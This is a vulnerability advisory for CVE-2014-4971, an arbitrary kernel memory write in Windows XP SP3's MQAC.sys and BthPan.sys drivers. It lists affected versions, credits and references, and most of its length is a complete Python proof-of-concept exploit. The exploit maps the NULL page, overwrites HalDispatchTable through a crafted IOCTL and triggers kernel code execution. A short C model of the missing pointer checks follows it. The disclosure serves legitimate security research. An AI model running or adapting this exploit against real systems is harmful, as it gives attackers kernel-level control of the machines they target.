
Multiple Microsoft Products Arbitrary Memory Write Privilege Escalation Vulnerability

Published: 2014-07-28 15:36:10


BugTraq ID: 68764

CVE ID: CVE-2014-4971


Affected systems:

Microsoft Windows XP SP3

Microsoft Bluetooth Personal Area Networking 5.1.2600.5512

Microsoft MQ Access Control 5.1.0.1110

Details:


Multiple Microsoft products (for example Bluetooth Personal Area Networking and MQ Access Control) contain multiple privilege escalation vulnerabilities. They stem from errors in the MQAC.sys and BthPan.sys drivers: by sending a specially crafted IOCTL request, a local attacker can write data to an arbitrary memory location and obtain kernel-level privileges.


Source:

Matt Bergin

References:

http://www.exploit-db.com/exploits/34112/


http://xforce.iss.net/xforce/xfdb/94753

Test method:

Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Users assume all risk!

```python
#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them :)
def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None
handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)
```
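As an added illustration (not part of the advisory or of the original PoC), the following C model shows the pointer validation a METHOD_NEITHER IOCTL handler must perform before storing through a caller-supplied output buffer, and why the length has to be checked before the probe: the PoC above passes a kernel address as the output buffer with an output length of 0, and a zero-length probe checks nothing. The 0x7FFF0000 user-space limit, the handler behaviour and the sample addresses (0x806E3210 standing in for a HalDispatchTable+4 style kernel address) are constructed assumptions, not values taken from the advisory.

```c
#include <stdint.h>
#include <stdbool.h>

/* Constructed for the example: the user/kernel boundary of 32-bit Windows XP
 * (MmUserProbeAddress is 0x7FFF0000 there). */
#define USER_PROBE_ADDRESS 0x7FFF0000u

/* Stand-ins for the NTSTATUS codes a real handler would return. */
enum { IOCTL_OK = 0, IOCTL_BUFFER_TOO_SMALL = 1, IOCTL_ACCESS_VIOLATION = 2 };

typedef struct {
    int status;        /* one of the codes above */
    uint32_t target;   /* address the 4-byte store went to, 0 if refused */
} ioctl_result;

/* Mirrors the range checks ProbeForWrite performs on a caller-supplied
 * pointer: aligned, no address-space wrap, entirely below the user limit.
 * Like the real routine, it accepts any range of length 0 unchecked. */
bool probe_for_write(uint32_t addr, uint32_t len, uint32_t align) {
    if (len == 0) return true;
    if (addr & (align - 1)) return false;              /* misaligned */
    if (addr > UINT32_MAX - len) return false;         /* addr + len wraps */
    if (addr + len > USER_PROBE_ADDRESS) return false; /* reaches kernel space */
    return true;
}

/* The vulnerable pattern: a METHOD_NEITHER handler stores through the raw
 * output pointer, so a kernel address is accepted like any other. */
ioctl_result handler_unchecked(uint32_t out_ptr, uint32_t out_len) {
    (void)out_len;
    ioctl_result r = { IOCTL_OK, out_ptr };
    return r;
}

/* Hardened handler: verify the length first (a zero length would otherwise
 * sail through the probe), then probe the exact range about to be written. */
ioctl_result handler_checked(uint32_t out_ptr, uint32_t out_len) {
    const uint32_t needed = sizeof(uint32_t);
    ioctl_result r = { IOCTL_OK, 0 };
    if (out_len < needed) { r.status = IOCTL_BUFFER_TOO_SMALL; return r; }
    if (!probe_for_write(out_ptr, needed, sizeof(uint32_t))) {
        r.status = IOCTL_ACCESS_VIOLATION;
        return r;
    }
    r.target = out_ptr;  /* only now is the store performed */
    return r;
}
```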

Solution:

Vendor patch:


Microsoft

---------

The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:


http://technet.microsoft.com/security/bulletin/